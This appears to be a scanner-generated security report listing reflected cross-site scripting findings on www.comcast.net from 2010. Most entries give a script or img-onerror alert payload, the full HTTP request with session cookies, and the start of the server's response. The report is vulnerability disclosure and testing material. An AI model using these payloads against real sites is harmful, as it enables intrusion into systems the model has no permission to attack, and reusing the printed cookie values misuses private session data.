The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc26"><script>alert(1)</script>895fb0d3fa6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/national1bc26"><script>alert(1)</script>895fb0d3fa6/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:20 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:20 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cafd"><script>alert(1)</script>c6016ae582e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/odd6cafd"><script>alert(1)</script>c6016ae582e/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:20 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:20 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154259
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 88c7e--><img%20src%3da%20onerror%3dalert(1)>edebff5d184 was submitted in the REST URL parameter 2. This input was echoed as 88c7e--><img src=a onerror=alert(1)>edebff5d184 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /news/odd88c7e--><img%20src%3da%20onerror%3dalert(1)>edebff5d184/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:34 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:34 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154633
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48f02<img%20src%3da%20onerror%3dalert(1)>39ff31c1383 was submitted in the REST URL parameter 2. This input was echoed as 48f02<img src=a onerror=alert(1)>39ff31c1383 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/odd48f02<img%20src%3da%20onerror%3dalert(1)>39ff31c1383/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:29 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:29 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b71"><script>alert(1)</script>f076230e9b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/politicsc7b71"><script>alert(1)</script>f076230e9b9/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:12 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:12 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7033f<img%20src%3da%20onerror%3dalert(1)>274078d2372 was submitted in the REST URL parameter 2. This input was echoed as 7033f<img src=a onerror=alert(1)>274078d2372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/politics7033f<img%20src%3da%20onerror%3dalert(1)>274078d2372/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:23 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:23 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload c34ca--><img%20src%3da%20onerror%3dalert(1)>6cceb973248 was submitted in the REST URL parameter 2. This input was echoed as c34ca--><img src=a onerror=alert(1)>6cceb973248 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /news/politicsc34ca--><img%20src%3da%20onerror%3dalert(1)>6cceb973248/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:28 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:28 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8771d"><script>alert(1)</script>ed2178a344a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/world8771d"><script>alert(1)</script>ed2178a344a/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:12 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:12 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c04<img%20src%3da%20onerror%3dalert(1)>82df29b4567 was submitted in the REST URL parameter 2. This input was echoed as 94c04<img src=a onerror=alert(1)>82df29b4567 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/world94c04<img%20src%3da%20onerror%3dalert(1)>82df29b4567/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:24 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:24 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload bedb8--><img%20src%3da%20onerror%3dalert(1)>e40b1a4d5bd was submitted in the REST URL parameter 2. This input was echoed as bedb8--><img src=a onerror=alert(1)>e40b1a4d5bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /news/worldbedb8--><img%20src%3da%20onerror%3dalert(1)>e40b1a4d5bd/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:29 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:29 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154677
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3f48"><script>alert(1)</script>bce088a4eb7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c9a"><script>alert(1)</script>cf869bb5a0f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /slideshow/finance-branddisasters15c9a"><script>alert(1)</script>cf869bb5a0f/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:11:31 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:16:31 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:11:31 GMT Content-Length: 31820 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e38"><script>alert(1)</script>2b6b246c1a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /slideshow/music-greenday89e38"><script>alert(1)</script>2b6b246c1a3 HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:11:35 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:16:35 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:11:35 GMT Content-Length: 31730 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cae2"><script>alert(1)</script>5af3151e2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /slideshow/news-spacepictures6cae2"><script>alert(1)</script>5af3151e2b HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:11:32 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:16:32 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:11:32 GMT Content-Length: 31725 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef90d"><script>alert(1)</script>0349d93d9fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /slideshow/sports-bestdressedathletesef90d"><script>alert(1)</script>0349d93d9fb/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:11:33 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:16:33 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:11:33 GMT Content-Length: 31876 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 74f43--><img%20src%3da%20onerror%3dalert(1)>935e2e5728f was submitted in the REST URL parameter 2. This input was echoed as 74f43--><img src=a onerror=alert(1)>935e2e5728f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /weather/1910374f43--><img%20src%3da%20onerror%3dalert(1)>935e2e5728f/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:35 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:35 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36838
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2f676<img%20src%3da%20onerror%3dalert(1)>46d5a7f7ec5 was submitted in the REST URL parameter 2. This input was echoed as 2f676<img src=a onerror=alert(1)>46d5a7f7ec5 in the application's response.
